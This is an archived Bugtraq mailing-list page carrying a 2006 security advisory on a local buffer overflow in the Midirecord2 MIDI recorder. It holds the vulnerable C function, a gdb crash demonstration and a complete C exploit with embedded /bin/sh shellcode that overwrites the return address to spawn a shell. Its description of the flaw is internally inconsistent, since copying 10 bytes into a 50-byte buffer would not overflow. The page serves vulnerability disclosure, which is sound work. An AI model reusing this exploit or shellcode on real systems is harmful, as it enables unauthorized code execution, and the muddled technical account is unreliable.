Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[ECHO_ADV_41$2006] BufferOverflow in Midirecord2

from [the_day] Network Security [Permanent Link]
Subject: [ECHO_ADV_41$2006] BufferOverflow in Midirecord2
Date: 25 Jul 2006 11:29:29 -0000 
ECHO_ADV_41$2006

---------------------------------------------------------------------------
[ECHO_ADV_41$2006] BufferOverflow in Midirecord2
---------------------------------------------------------------------------

Author       : Dedi Dwianto
Date         : July, 25th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv41-theday-2006.txt
Exploitation : Local 
Critical Lvl : High
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : Midirecord
version     : 2
URL         : http://tuma.stc.cx/progs.php
Description :
Midirecord is a simple command-line application to record a MIDI file with your 
MIDI keyboard. It also features automatic recording to a MIDI file when you 
play 
electric piano, and thus it may be used as a "recording daemon".

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
The function daemon in affected by a bufferoverflow which could allow
an attacker to execute malicious code from local.
The problem is caused by the copyung of a string of max 10 bytes in the filename
buffer of only 50 bytes.

------------------midirecord.cc-----------------------------
void daemon(FILE* fin)
{
   char filename[50];
   printf("Waiting for note-on event.\n");
   while(cont)
   {
        unsigned char status;
        fread(&status, 1, 1, fin); // read status
        if(status>>4 == 0x9)
        {
            get_datestr(filename);
            printf("Starting to record to %s.\n",filename);
            recordmidi(fin, filename);
            if(cont)
                printf("Finished. Starting to wait for note-on event.\n");
        }
   }

}
----------------------------------------------------------

POC:
~~~~
$gdb midirecord
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library 
"/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 10000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/midirecord2c/midirecord `perl -e 'print "A" x 10000'`
Waiting for note-on event.

Program received signal SIGSEGV, Segmentation fault.
0xb7dcb4b0 in fread () from /lib/tls/i686/cmov/libc.so.6
(gdb)

-------Exploit Code-------
/* Succesfull Exploit in Ubuntu Breezey */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1
int main(int argc, char **argv )
{
        char shellcode[]=
                "\x6a\x17\x58\x31\xdb\xcd\x80"
                
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";

        if(argc < 2)
                 {
           fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
             return 0;
             }
        char *env[] = {shellcode, NULL};
        char buf[BUFSIZE];
                int i;
                int *ap = (int *)(buf + ALIGNMENT);
                int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

                for (i = 0; i < BUFSIZE - 4; i += 4)
                *ap++ = ret;
                execle(argv[1], "/dev/midi1", buf, NULL, env);

}

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ My Lovely Jessy
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [ECHO_ADV_41$2006] BufferOverflow in Midirecord2, the_day <=
Previous by Date:  [Full-disclosure] ZDI-06-025: Mozilla Firefox Javascript navigator Object Vulnerability, zdi-disclosures
Next by Date:  [vuln.sg] PowerArchiver DZIPS32.DLL Buffer Overflow Vulnerability, vulnpost-remove
Previous by Thread:  [Full-disclosure] ZDI-06-025: Mozilla Firefox Javascript navigator Object Vulnerability, zdi-disclosures
Next by Thread:  [vuln.sg] PowerArchiver DZIPS32.DLL Buffer Overflow Vulnerability, vulnpost-remove
Indexes:  [Date] [Thread] [Top] [All Lists]